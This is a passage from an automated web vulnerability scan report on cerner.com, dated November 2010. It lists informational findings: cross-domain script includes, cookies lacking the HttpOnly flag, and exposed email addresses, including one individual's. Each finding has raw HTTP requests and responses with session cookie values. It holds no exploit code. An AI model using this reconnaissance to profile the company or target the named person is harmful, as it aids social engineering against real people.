<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.18. http://cerner.com/solutions/Hospitals_and_Health_Systems/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Hospitals_and_Health_Systems/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/Hospitals_and_Health_Systems/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:15 GMT Content-Length: 27950 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.19. http://cerner.com/solutions/Hospitals_and_Health_Systems/Radiology/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Hospitals_and_Health_Systems/Radiology/ |
Issue detail
The response dynamically includes the following scripts from other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://player.ooyala.com/player.js?width=640&height=360&embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG
Request
GET /solutions/Hospitals_and_Health_Systems/Radiology/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:09 GMT Content-Length: 25357 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... </p> <script src="http://player.ooyala.com/player.js?width=640&height=360&embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG" type="text/javascript"></script> ...[SNIP]...
|
4.20. http://cerner.com/solutions/Hospitals_and_Health_Systems/Revenue_Cycle/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Hospitals_and_Health_Systems/Revenue_Cycle/ |
Issue detail
The response dynamically includes the following scripts from other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://player.ooyala.com/player.js?width=640&height=360&embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh
Request
GET /solutions/Hospitals_and_Health_Systems/Revenue_Cycle/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:08 GMT Content-Length: 23774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... </ul> <script type="text/javascript" src="http://player.ooyala.com/player.js?width=640&height=360&embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh"></script> ...[SNIP]...
|
4.21. http://cerner.com/solutions/Individuals_and_Families/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Individuals_and_Families/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/Individuals_and_Families/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:07 GMT Content-Length: 23192 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.22. http://cerner.com/solutions/Medical_Devices/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Medical_Devices/ |
Issue detail
The response dynamically includes the following scripts from other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://player.ooyala.com/player.js?width=300&height=168&embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm
Request
GET /solutions/Medical_Devices/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:11 GMT Content-Length: 25381 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <div class="img-float"><script type="text/javascript" src="http://player.ooyala.com/player.js?width=300&height=168&embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm"></script> ...[SNIP]...
|
4.23. http://cerner.com/solutions/Pharmacies/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Pharmacies/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/Pharmacies/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:13 GMT Content-Length: 22774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.24. http://cerner.com/solutions/Physician_Practice/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Physician_Practice/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/Physician_Practice/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:42 GMT Content-Length: 23086 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.25. http://cerner.com/solutions/Research/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Research/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /solutions/Research/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:26 GMT Content-Length: 22986 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.26. http://cerner.com/support/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/support/ |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /support/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:17:10 GMT Content-Length: 18030 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/red.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
4.27. http://cerner.com/workarea/csslib/ektronCss.ashx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/workarea/csslib/ektronCss.ashx |
Issue detail
The response dynamically includes the following script from another domain:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
Request
GET /workarea/csslib/ektronCss.ashx HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:02 GMT Connection: close Content-Length: 12912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]...
|
5. Cookie without HttpOnly flag set
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; path=/
- EktGUID=fe08f2c1-ffbc-4a01-9c67-6a34c504f953; expires=Fri, 11-Nov-2011 22:56:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
Request
GET / HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: cerner.com
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; path=/ Set-Cookie: EktGUID=fe08f2c1-ffbc-4a01-9c67-6a34c504f953; expires=Fri, 11-Nov-2011 22:56:48 GMT; path=/ Set-Cookie: EkAnalytics=0; expires=Fri, 11-Nov-2011 22:56:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=i45s4a45toxhbwqmzssyho45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:56:49 GMT Content-Length: 15327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]...
|
6. Email addresses disclosed
previous
next
There are 8 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
6.1. http://cerner.com/GlobalPrivacy/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/GlobalPrivacy/ |
Issue detail
The following email address was disclosed in the response:
Request
GET /GlobalPrivacy/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:57 GMT Content-Length: 29165 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <br />Email: bdahlin@cerner.com</p> ...[SNIP]...
|
6.2. http://cerner.com/Privacy/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/Privacy/ |
Issue detail
The following email address was disclosed in the response:
Request
GET /Privacy/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:55 GMT Content-Length: 32865 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:webmaster@cerner.com" title="Webmaster Email Address">webmaster@cerner.com</a> ...[SNIP]...
|
6.3. http://cerner.com/ScriptResource.axd
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/ScriptResource.axd |
Issue detail
The following email addresses were disclosed in the response:- ClientCareCenter@cerner.com
- clientcarecenter@cerner.com
Request
GET /ScriptResource.axd HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 23:05:43 GMT Connection: close Content-Length: 12955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:clientcarecenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3C404 - File Not Found%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/ScriptResource.axd%3E"> ...[SNIP]... </a> at ClientCareCenter@cerner.com, <a href="/contactus/"> ...[SNIP]...
|
6.4. http://cerner.com/Terms_Of_Use/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/Terms_Of_Use/ |
Issue detail
The following email addresses were disclosed in the response:- Webmaster@cerner.com
- onlinemarketing@cerner.com
- webmaster@cerner.com
Request
GET /Terms_Of_Use/ HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:17:36 GMT Content-Length: 51969 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... Web Sites, or by written communication delivered by first class U. S. mail to your address on record in Cerner...s account information. You may give notice to Cerner at any time via electronic mail to Webmaster@cerner.com or by letter delivered by first class postage prepaid U. S. mail or overnight courier to the following address:</p> ...[SNIP]... <p>E-mail: onlinemarketing@cerner.com </p> ...[SNIP]... <p>Send an email to: webmaster@cerner.com</p> ...[SNIP]...
|
6.5. http://cerner.com/WebResource.axd
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The following email addresses were disclosed in the response:- ClientCareCenter@cerner.com
- clientcarecenter@cerner.com
Request
